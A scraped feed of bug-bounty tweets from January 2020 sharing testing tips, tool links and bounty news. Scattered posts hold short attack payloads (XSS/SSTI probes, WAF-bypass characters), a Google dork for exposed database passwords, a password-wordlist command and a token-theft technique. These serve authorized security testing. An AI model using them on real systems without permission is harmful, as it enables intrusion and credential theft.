8 Watch @fransrosen Keynote at #bsidesahmedabad2019 https://t.co/hcJkB3r3po #BugBountyTip #bugbounty #KeynoteSpeaker #infosec #Pentesting #hacking #Hacked
Ismayil Tahmazov
@Tismayil1


2020-01-22 11:30:41
2 @AsrcSecurity thanks for gifts. #bugbounty #bugbountytips #BugBountyTip #bugbounty2020goals https://t.co/0jn1CUTjEH
Yadhavi
@PrincessYadhavi


2020-01-22 08:35:53
0 anyone know golang version of whatweb tool? #bugbounty #bugbountytip #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-22 08:28:47
3 Connected Cars #hacking ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/hE4MdPWXNu
Hussein Daher
@HusseiN98D


2020-01-21 22:34:45
17 #BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on @Burp_Suite to do achieve this! #bugbountytips #infosec #hacking #pentest #pentesting #bugbounty RT and Follow, book coming!
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 21:32:55
0 Awesome GitHub Repos 9. Awesome Web Security = https://t.co/JYwoh7QCdy 10. Penetration Test Guide based on OWASP = https://t.co/6YKTRRvvTZ 11. Pentest Compilation = https://t.co/fbpKJXGnWI 12. Infosec Reference = https://t.co/KSGiX8Vv1D #bugbountytips #bugbountytip #hacking https://t.co/j75f0AfTpa
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 21:32:15
0 Awesome GitHub Repos 5. Awesome Web Hacking = https://t.co/tS4wYzEZ4v 6. Awesome Hacking Resources = https://t.co/i6d4C1OIzN 7. Awesome Pentest = https://t.co/eZ5mDtUi3a 8. Awesome Red Teaming = https://t.co/zu17ZEK16J #bugbountytips #bugbountytip https://t.co/FfNJ4D2imR
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 21:31:30
0 Awesome GitHub Repos 1. Book of Secret Knowledge = https://t.co/kLqcHAo7gV 2. Awesome Hacking = https://t.co/vRBXZkxI29 3. Awesome Bug Bounty = https://t.co/lMh6dqBGN1 4. Awesome Penetration Testing = https://t.co/9cDaJLVKGm #bugbountytips #bugbountytip #hacking https://t.co/yCTNbsHWcr
Kenan
@kenanistaken


2020-01-21 20:39:11
1 newbies ask,where to start,what to learn. start at home,start at work,start whereever you want,just start. learn whatever you want. no need to ask these questions anymore anybody. I'm here because I am experienced computers since 90s. you still ask where to start ๐Ÿ˜‚ #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 18:12:29
0 What was your worst bug bounty mistake? #bugbounty #bugbountytips #bugbountytip
healthyoutlet
@healthyoutlet


2020-01-21 17:06:44
0 When devs are nice enough to leave an accessible sourcemap, use this tool to download everything so you don't have to analyze the code in your browsers debugger: https://t.co/bS6dJmXkOY #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 16:47:15
0 What was your worst bug bounty mistake? My was reporting Sql databse username and password leak to a out of scope domain, report got not valid and -ve points, although they fixed that. -_- #bugbounty #bugbountytips #bugbountytip
Eduard Tolosa
@Edu4rdSHL


2020-01-21 14:25:59
2 `sudo -l` gives you a list of allowed and forbidden commands for the current user. It's useful because sometimes people allow certain (dangerous) commands without using password, so you can do a local privilege escalation. #linux #bugbountytip #BugBounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-21 11:46:01
0 Without a strong lockout mechanism, the application may be susceptible to brute force attacks. ๐Ÿคœ๐Ÿšช Use combinations of incorrect password attempts and correct login credentials to test lockout mechanism rules. #cybersecurity #bugbountytip #appsec https://t.co/lWVLEqWX0Z
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 10:54:00
0 - Hey folks <3 Here is a "OSINT , Capture the flag" challenge :) This is a mixture of OSINT & steganography challenge โ™ฅ๏ธ Attachment: https://t.co/61DLQoCROi Password - nullcrowd #ctf #ctfchallenge #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/0EAqyPy3Ln
thehackerish
@thehackerish


2020-01-21 09:59:30
0 When looking on known exploits for a target, Twitter can help you: search "target #bugbountytip". The #BugBounty community can surprise you sometimes with cool tricks!
ฮทฮฑeโท
@chocolatey_tae


2020-01-21 09:28:31
2 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/kH0TUTWYJW #hacker #BugBounty #bugbountytip
Cipher_942
@Ciper_942


2020-01-21 09:26:52
0 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/xZYf0qZTkd #hacker #BugBounty #bugbountytip
niravsikotaria
@niravsikotaria


2020-01-21 03:09:04
5 Challenge Link: https://t.co/8y1ld1iXkq Parameter: ruid Bug Type: Expression Language Injection Send POC in PM. @gabsmashh @stokfredrik #hacking #pentesting #infosec #bug #bugbounty #hackerone #bugbountytip #bugbountytips
Aashish Yadav
@aa5h15h


2020-01-20 20:21:18
4 First Steps in Hyper-V Research https://t.co/oM3FgO4A2e #research #infosec #cybersecurity #pentest #redteam #exploit #hackerone #hyperv #bugbounty #malware #virtualization #oracle #virtualbox #bugbountytip #windows #linux #unix #dev #bugcrowd #RETWEEET #programming https://t.co/vOEH9qiR6E
Hussein Daher
@HusseiN98D


2020-01-20 20:07:28
16 Time for a new #bugbounty tip! When I sign up to a website/newsletter/reset password, I look at the website which hosts the logo/image in the email I receive. This led me multiple time to insecure AWS S3 buckets and scope expansion. #bugbountytip #bugbountytips #infosec #hacking
bug bounty tips - Retweet
@BugbountytipsR


2020-01-20 16:32:50
0 I have been reading diff API testing related article but didn't find any direct/satisfied article that can dive me in deep. It will be really gr8 if you guys can share some article/presentation/video or your own tip :) #bugbountytips #bugbountytip (1/2)
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-20 14:02:48
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8hvsLmZL9C
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-19 22:00:04
0 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/MjI0yCtJ7Vย  #bugbountytips #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-19 20:43:51
4 -Sample penetration testing report: https://t.co/crnmtmack8 -Tips on writing a penetration testing report:: https://t.co/BRfhyllyLe -Technical penetration report sample:: https://t.co/3XGsBppDN4 -Nessus sample reports: https://t.co/xaKxlGxtkj #bugbountytip #Hacking #PenTest
Hussein Daher
@HusseiN98D


2020-01-19 20:18:45
5 I must say sorry to all my #bugbounty and #infosec followers for being off for the past month. But no worries, I'll come back with exciting news soon. I'll be hiring too! Stay tunned for a #bugbountytip tomorrow ๐ŸŽ‰
inc0gbyt3
@incogbyte


2020-01-19 20:06:29
1 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/uM6v58Ufzt #bugbountytips #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-19 19:51:19
0 One liner to get root domains, by @nahamsec #bugbountytip cat hosts | rev | cut -d "." -f 1,2,3 | rev | sort -u
Anshuman Pattnaik
@anspattnaik


2020-01-19 03:12:24
0 #BugBounty #bugbountytip Found many open ports for a target port 22 - ssh (required password) port 21 - FTP (required password) port 445 - SMTP (required password) port 53 - domain (Possible Dos attack) port 8443 - Admin login page (required password) Should I report it?
Kyle
@B3nac


2020-01-19 02:52:16
0 If the default login request is POST check in Burp if GET is allowed and append the post attributes. For example. https://example . com/login?&username=TotallySecure&password=hunter2 If there is no CSRF token $. #bugbountytip
myo ko
@nutronex


2020-01-19 02:41:59
0 #bugbountytips #bugbountytip tagged as duplicate after 2 weeks :) https://t.co/5aOJw8BEjE
thehackerlab.io
@the_hacker_lab


2020-01-19 00:03:03
2 Rewrote my recon bot to output to markdown and upload to a git server and I love it, next step is to make it a docker container so I can swarm all the wildcards #BugBounty #hackerone #bugcrowd #bugbountytip Only a few of the steps are shown here but add it to your workflow
thehackerlab.io
@the_hacker_lab


2020-01-18 23:45:21
0 Over 50 Domains with XSS found this week on an old AF public program.. then triaged by hackerone.. it was raining alert(https://t.co/7GXCCGXJgp) #bugbountytip Just keep looking....... the bugs are out there !
bugbountytip
@a_l_e_r_t_1_


2020-01-18 18:12:20
1 GET /xyz 404 NOT FOUND GET /xyz/abc 200 OK GET /xyz 403 FORBIDDEN GET /xyz/abc 200 OK Look everywhere !!! #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-18 16:45:48
0 Site: If a post get 1000+ report abuse then site will automatically delete post. h1_squirtle: Clicking the "Report Abuse Button" 1000 TIme. ============= BOOM Post Deleted ============= $$ 300 $$ Profile: h1/h1_squirtle https://t.co/lWhHQIrwEC #bugbountytips #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-18 12:45:49
0 Task: Find flag, and send your flag to me Hint: It looks like binary but it's not that Don't share your flag Flag Type - NULLCROWD*{} I'll post a solution when the challenge is closed Attachment: https://t.co/x0VIjoGjFT Password - nullcrowd* #bugbountytips #bugbountytip #ctf https://t.co/SXe1drnzLP
dark_warlord14
@dark_warlord14


2020-01-18 08:18:29
0 Guide on how to proxy https traffic from emulator via burpsuite. It works. https://t.co/su35MeoCU4 #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-18 06:22:31
0 Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application https://t.co/WQ22tfAnmm #bugbounty #bugbountytips #bugbountytip #bugbounty2020goals
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-18 06:21:28
0 1) Cable Haunt Vulnerability Haunts Cable Modems Using Broadcom Chips https://t.co/TTH8SCVSqa 2) Testing for XSS (Like a KNOXSS) https://t.co/kvdt9AjTKQ 3) Hacking Java Deserialization https://t.co/MnvJmuTvaJ #bugbounty #bugbountytip #bugbounty2020goals
Jason
@zeroauth


2020-01-18 02:44:11
0 Want to hear a Bounty Hunter fail? my ImageTragick test payloads this entire time had a typo of my callback address, so this entire time testing image uploads were worthless, and I never documented where they were... #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2020-01-17 22:42:44
0 Click-to-copy feature for an API key? Check for x-frame-options / frame-ancestors. If you can frame the page you can clickjack the key with just a click and a ctrl-v. #BugBountyTip
thehackerish
@thehackerish


2020-01-17 18:00:06
1 #bugbountytip: If you are struggling to run #hashcat on your host, uou may want to run it in #docker instead. I've had success with it, cracking 6 passwords in an assignment. https://t.co/S81qOwyOWs
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 17:17:15
0 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/1zOHSPhURnย โ€ฆ
Karna
@karna__1


2020-01-17 17:06:08
0 #BugBountyTip #bugbountytips #infosec Yep. A huge difference indeed! When you feel all down and exhausted and messed up, just go get some sleep! Chances are you'll wake up the next day with a different kind of energy :) Take rest and get merry @ArchAngelDDay <3 https://t.co/HKXAMiM37m
B.S aymen
@depression0x01


2020-01-17 11:02:02
0 Anyone here is using RSS feeds ? and which channels are u following for being aware about new CVE's I can't find nist cve channel ? #Security #BugBounty #bugbountytips #BugBountyTip #RSS_FOR_ALL #CVE
Sayaan Alam
@ehsayaan


2020-01-17 08:02:07
0 Just Submitted a Critical Subdomain Takeover to Account Takeover Vulnerability.... Hope For the Best!!! #Hacked #bugbounty #BugBountyTip
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 06:34:36
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/ZBC76PiwTP
Paulos Yibelo
@PaulosYibelo


2020-01-17 05:26:30
2 This is one common way for me to find high severity auth bypass vulnerabilities in high profile targets. Example: https://t.co/9GffzeEp0m #bugbounty #bugbountytip https://t.co/mrgnQhnue5
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 01:20:06
2 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/8x01PWjpmW
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 00:50:46
2 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 00:15:30
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/qibBdtN35d
Mrityunjoy
@mitunjoy11


2020-01-16 17:06:55
2 #BugBountyTip When you looking for bugs on a program, always check for programs browser extensions, some times you can got some cool SSRF ;) https://t.co/b1a1zitFjS
siLLyDaDDy
@sillydadddy


2020-01-16 15:50:38
3 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/bqBhpeLOtz
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-16 13:34:57
4 Using CeWL to map a website to build a custom wordlist(for password crackers),using words and phrases scraped from the target web pages: cewl -v -d 2 -m 5 -w results http://xx.xx.xx.xx/home/ -d=Depth to spider -v=Verbose output -m=Minimum word length #bugbountytip #Hacking
intigriti
@intigriti


2020-01-16 13:02:13
36 So you believe UUID's are a sufficient protection against IDOR's? Think again! ๐Ÿคฆ Thanks for the #BugBountyTip, @securinti https://t.co/zx5Xn7iDrE
BSides Ahmedabad
@bsidesahmedabad


2020-01-16 09:02:11
4 Closing note of @stokfredrik at #bsidesahmedabad #bugbountytip #bugbounty #infosec https://t.co/eKeJK1PmYf
Ahmed M. Elhady
@Br3akm30ut


2020-01-15 20:04:58
5 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
dark_warlord14
@dark_warlord14


2020-01-15 17:08:32
0 inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles This google dork is scary as shit. #bugbountytip https://t.co/vWkHcHIMDN
@cr33pb0y
@theyiyibest


2020-01-15 06:56:09
0 Yay, I was awarded a $XXX bounty on @Hacker0x01! First RXSS of the year. Payload: [1].map(alert) https://t.co/7vrkzfnbNA #TogetherWeHitHarder #bugbountytip #wafbypass
Eduard Tolosa
@Edu4rdSHL


2020-01-15 05:54:39
0 @Docker The image size is just 41MB! Special mention to @Spaceprogrammer for the idea and initial dockerfile! #bugbounty #bugbountytips #bugbountytip #osint #recon #tools
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-14 23:52:49
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/FzqCz83DY3
bugbountytip
@a_l_e_r_t_1_


2020-01-14 22:05:09
0 Can I bypass it ? Any suggestions ? ( \ ) #bugbountytips #bugbountytip https://t.co/WshiSHcmrM
๏ฃฟHasan
@hasan_zmzm


2020-01-14 20:20:14
0 Simple #1 rule. #BugBountyTip https://t.co/rUq3znRuov
Nick || hunt4p1zza
@ngkogkos


2020-01-14 19:08:56
3 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/5KxNTLvx4l
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-14 17:50:39
2 Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
Zero Xyele
@zeroxyele


2020-01-14 17:50:29
0 Get intelligence alerts from your targets using by https://t.co/ceSFlbIYul! (@_IntelligenceX) #hackerone #hacker101 #bugbounty #bugbountytip #bugbountytips #bugcrowd #intelligence https://t.co/rj4FQavyU0
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-14 17:34:50
1 Active Directory Visualization for Blue Teams and Threat Hunters https://t.co/exGykctRyY Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
AkaaZaan
@AkaaZaan


2020-01-14 16:28:30
0 I am giving out $300 to the one who shares a working tip on bypassing Authorization bearer header. #Bugbountytip
robre
@_robre


2020-01-14 15:01:25
0 Create a list of interesting keywords for grep: $ echo โ€žpassword\ntoken\nsecret\nusernameโ€œ>~/dict/words.txt $ alias secgrep=โ€šgrep -f ~/dict/words.txtโ€˜ $ secgrep -r somedir/ somedir/file.php: dbpassword: hunter2 #BugBountyTip #bugbountytips #hacking @TomNomNom
reconness
@reconness


2020-01-14 14:01:58
1 Working on screenshot Agents feature #bugbountytips #BugBountyTip #bugbounty2020goals
Mashoud1122
@mashoud1122


2020-01-14 10:21:07
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/NIuW4ennqY
Imran Parray
@CreedHackers


2020-01-14 09:57:31
0 @tirtha_mandal @synack @SynackRedTeam Since you have added #BugBountyTip as a hastag in your tweet i would like to know how this tweet a bug bounty tip.
Israel Thomas
@IsraelThomas_7


2020-01-14 09:05:29
0 I jus love SSL misconfigurations! :) #BugBountyTip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-14 07:04:51
0 https://t.co/AQ1isKOUi5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #cybersecurity
Mourad
@SecuAudit


2020-01-14 04:03:59
0 i need someone who speak Vietnamese . #bugbounty #BugBountyTip
Mashoud1122
@mashoud1122


2020-01-14 01:22:50
1 Using A Reflected XSS to steal FB Auth Tokens[increase impact] if login with facebook is available use the rxss to reflect the location hash. Put the rxss url in the facebook auth flow[ redirect_uri ]. See the magic view the pic for more #BugBountyTip #BugBountyTips #BugBountyTip https://t.co/xKExO8OAcp
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-14 00:58:52
0 Here is another write up for 2fa bypass. https://t.co/CDff0sKP0Uย โ€ฆ #hacking #bugbountytip #infosec #writeup
dark_warlord14
@dark_warlord14


2020-01-13 18:57:01
0 Hacked up alias for ffuf to store all search results so you can look at them later. #bugbountytips #bugbountytip https://t.co/uDTJUGMTj1
Nick || hunt4p1zza
@ngkogkos


2020-01-13 17:58:38
0 If a subdomain returns a default/under construction or dead page, it may still be worth to run it through @hacker_'s getallurl + @TomNomNom's concurl tools to request all URLs & identify any URLs with different response. See image for commands. #BugBounty #bugbountytip https://t.co/YNXB7uamRY
Numan ร–ZDEMฤฐR
@numanozdemircom


2020-01-13 17:57:25
0 Who wanna find Critical (P1) vulnerabilities just in 10 seconds? An easy bounty tip for you. [PHP] Exposing DB Credentials / HttpOnly Bypass / Full Path Disclosure https://t.co/t08E7xzvG5 #BugBounty #bugbountytips #bugbountytip
Ebrahim Hegazy
@Zigoo0


2020-01-13 13:11:57
11 #BugBountyTip When using #Nmap as part of your #Recon arsenal, make sure to add --data-length=50 {or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open). #TBC
Yadhavi
@PrincessYadhavi


2020-01-13 12:44:10
0 Can I report Exposed google map api key on @Bugcrowd platform program? Is it valid bug? #bugbounty #bugbountytip #bugbountytips
Arif Khan
@payloadartist


2020-01-13 11:56:33
1 I m surprised at how often companies use these credentials in internal login panels: company_name company_name admin company_name employee_name (/github username/from LinkedIn/any public source) company_name #bugbounty #bugbountytip #infosec
Tirtha Mandal
@tirtha_mandal


2020-01-13 09:45:30
1 Thursday's full night hunting finally paid off by @synack. Good start of 2020. Thank you @synack @SynackRedTeam #xss #bugbounty #synack #srt #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/WQWiJCtNPD
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-13 09:22:00
0 When mapping an application, pay special attention to all HTTP requests (i.e. GET and POST), as well as every parameter and form field that is passed to the application. #BugBountyTip #CyberSecurity #infosec https://t.co/D9QWw9BxWm
Lokesh Sonagra
@Anonx_pro


2020-01-13 01:51:02
2 Top Bug Bounty Tools 1. Burp Suit 2. Vulnerability Lab 3. Google Dorks 4. DNS Discovery 5. WAPITI 6. INalyzeR #hackerone #hackers #hack #bugbounty #bugcrowd #python #sqlinjection #programmers #hacks #bugbountytip #ruby #indianhackers #ssrf #developers #bughunters #xxe #hacker
Jason
@zeroauth


2020-01-13 00:35:15
0 Just made a small blog post detailing how I used Frida to bypass SSL cert pinning on a custom cert pinning integration. App developer made their own function instead of using the X509TrustManager. https://t.co/OfYS6ofaBP #bugbountytip #bugbountytips
QSoloX
@QSoloX


2020-01-12 18:27:05
0 How common do you guys find http parameter pollution exploits? Just wacthed a video from @PwnFunction and was very intrigued about it. Its one of those things that even just a month ago i would have never though to be possible. #bugbountytip #bugbounty #hacking
Petko D. Petkov
@pdp


2020-01-12 17:48:04
0 Access to the right tools makes a huge difference when doing pentests and bug bounty hunting. How do you know which tool is good/right? Here is the deal. Good tools ultimately save you time - loads of time. #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-12 13:28:27
0 OLD IS GOLD for @bobby6102000 HACKED NORD VPN OLD WD VERSION $$$$$$$$$$$$$$$$$ BOUNTY $500 $$$$$$$$$$$$$$$$$ READ HERE https://t.co/jSxpimqExU #bugbountytips #bugbountytip BTW BOBBY BRUH #IndiaRejectsCAA_NRC_NPR
Pratik Dabhi
@impratikdabhi


2020-01-12 13:18:08
1 Payload for test XSS , SQLI , SSTI vulnerabilities. '"><svg/onload=alert()>{{7*7}} #Payload #XSS #SQLI #SSTI #BugBountyTip
WebSecurityIT
@WebSecurityIT


2020-01-12 12:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbountโ€ฆ
WebSecurityIT
@WebSecurityIT


2020-01-12 09:30:00
1 RT @godzilla74: Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
d0nut
@d0nutptr


2020-01-12 08:44:07
2 If example[.]com points to IP 1.2.3.4 and redirect to www[.]example[.]com but www[.]example[.]com doesn't point to anything (No A, AAAA, CNAME), try submitting your HTTP request to http://1.2.3.4/ with a "HOST: www[.]example[.]com" header. #bugbountytip #bugbountytips
WebSecurityIT
@WebSecurityIT


2020-01-11 20:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbountโ€ฆ
Rafael Cintra
@RafaelCintraSec


2020-01-11 17:24:37
0 shx_webgame - Resolvendo CTF - Shellter Labs https://t.co/H5AZAr9OaR #hacking #ctf #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2020-01-11 17:00:01
11 New video incoming! ๐Ÿšจ In this video, we talk APIs. What they are, where to find them, and most importantly how to test them for bugs! We cover: API recon, the most common API bugs and teach you how to find them #bugbountytip #BugBounty #CyberSecurity https://t.co/3hDwOizxwl https://t.co/kPHof1JHtp
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-11 14:52:41
0 Awesome Hacking Tool Lists https://t.co/LauqqrTZ82 #bugbounty #bugbountytips #bugbountytip #android #webpentest #Malware #penteset
Fisher
@Regala_


2020-01-11 14:06:44
2 Tip that has been shared a thousand times but to reiterate: always make a video POC in your reports. It takes 2 minutes and you're covering your future self in case things get fixed, environment change, shit lits on fire. #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-11 03:29:38
1 One line to extract urls from a folder #bugbountytip grep -oriahE "https?://[^\"\\'> ]+" *
Abhishek ๐Ÿ•ต๏ธ
@abhishake100


2020-01-10 17:55:32
2 I just published "My First RCE (Stressed Employee gets me 2x bounty ๐Ÿค‘)" #bugbounty #bug #bounty #bugbountytip https://t.co/11GF7bsr8J
Sourav Sahana
@kernel_rider


2020-01-10 15:34:51
0 Here is another write up for 2fa bypass. https://t.co/ORu7ZWvJjP #hacking #bugbountytip #infosec #writeup
Justin Farmer
@godzilla74


2020-01-10 15:14:02
0 Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-10 09:22:02
4 When doing search engine reconnaissance, do not limit testing to just one search engine provider, as different search engines may generate different results. ๐Ÿง‘โ€๐Ÿคโ€๐Ÿง‘๐Ÿ‘ฏ #pentesting #CyberSecurity #infosec #OSINT #BugBountyTip https://t.co/z3TAwSxZnB https://t.co/SD8uQVh5XC
Digital Business News
@DASummerCamp


2020-01-10 05:15:00
0 In this week's blog, iBaibhavJha writes about how he found found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/SJLKTZSdRs
Nassec.io
@nassecio


2020-01-10 04:47:33
2 In this week's blog, @iBaibhavJha writes about how he found found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/tYuY4jldiV
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-10 02:19:15
1 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/zUtp0QmdQK
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-10 00:54:18
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/0GODNlKoK3
Daher Mohamed
@DaherMohamed4


2020-01-09 17:25:00
0 Approx 5k$ bounties for multiple Admin Blind XSS Injection. Thanks @IAmMandatory @Bugcrowd #bugbountytip #bugbountytips Used xsshunter tool for blind xss(s) https://t.co/3vBS224SI2
Renwa
@RenwaX23


2020-01-09 15:22:02
0 OnePlus Bug Bounty Program is Scam #bugbountytip
Oghenejivwe ๐Ÿ‡ณ๐Ÿ‡ฌ๐Ÿ—ฏ
@realOghenejivwe


2020-01-09 14:35:34
0 There are very few things on earth more frustrating than spending hourssssssss, looking for bugs and finding none..Worse still in a CTF program! ๐Ÿ˜๐Ÿ˜‘ #bugbounty #bugbountytip #bugbounty2020goals
LivEdOverflow ๐Ÿ”ด๐Ÿธ
@LivEdOverflow


2020-01-09 13:35:27
1 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @ฬถLฬถiฬถvฬถeฬถOฬถvฬถeฬถrฬถfฬถlฬถoฬถwฬถ @EdOverflow!https://t.co/IoLsH8w4aQ https://t.co/aK4FU9iZ6z
intigriti
@intigriti


2020-01-09 13:05:16
